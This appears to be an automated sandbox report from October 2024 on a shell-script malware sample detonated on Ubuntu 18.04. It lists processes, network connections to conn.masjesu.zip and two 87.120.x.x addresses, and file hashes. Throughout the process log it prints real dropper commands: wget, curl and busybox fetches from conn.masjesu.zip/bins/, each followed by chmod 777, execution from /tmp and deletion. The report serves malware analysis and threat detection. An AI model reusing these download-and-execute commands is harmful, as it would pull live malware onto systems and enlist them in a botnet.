/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/bin/chmod

[chmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK

[./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/bin/rm

[rm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/bin/chmod

[chmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB

[./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/bin/rm

[rm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/bin/chmod

[chmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I

[./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/bin/rm

[rm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/bin/chmod

[chmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O

[./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/bin/rm

[rm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/bin/chmod

[chmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ

[./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/bin/rm

[rm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/bin/chmod

[chmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S

[./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/bin/rm

[rm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/bin/chmod

[chmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv

[./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/bin/rm

[rm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/bin/chmod

[chmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp

[./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/bin/rm

[rm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/bin/chmod

[chmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4

[./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/bin/rm

[rm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/bin/chmod

[chmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7

[./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/bin/rm

[rm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/bin/chmod

[chmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw

[./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/bin/rm

[rm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/bin/chmod

[chmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn

[./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/bin/rm

[rm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/bin/chmod

[chmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A

[./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/bin/rm

[rm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/bin/chmod

[chmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL

[./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/bin/rm

[rm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/bin/chmod

[chmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK

[./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/bin/rm

[rm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/bin/chmod

[chmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB

[./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/bin/rm

[rm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/bin/chmod

[chmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I

[./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/bin/rm

[rm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/bin/chmod

[chmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O

[./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/bin/rm

[rm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/bin/chmod

[chmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ

[./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/bin/rm

[rm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/bin/chmod

[chmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S

[./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/bin/rm

[rm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/bin/chmod

[chmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A

[./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/bin/rm

[rm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/bin/chmod

[chmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv

[./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/bin/rm

[rm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/bin/chmod

[chmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp

[./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/bin/rm

[rm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/bin/chmod

[chmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4

[./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/bin/rm

[rm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/bin/chmod

[chmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7

[./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/bin/rm

[rm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/bin/chmod

[chmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw

[./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/bin/rm

[rm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/bin/chmod

[chmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn

[./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/bin/rm

[rm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp

Files

/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 03:08

Reported

2024-10-18 03:11

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh

[/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
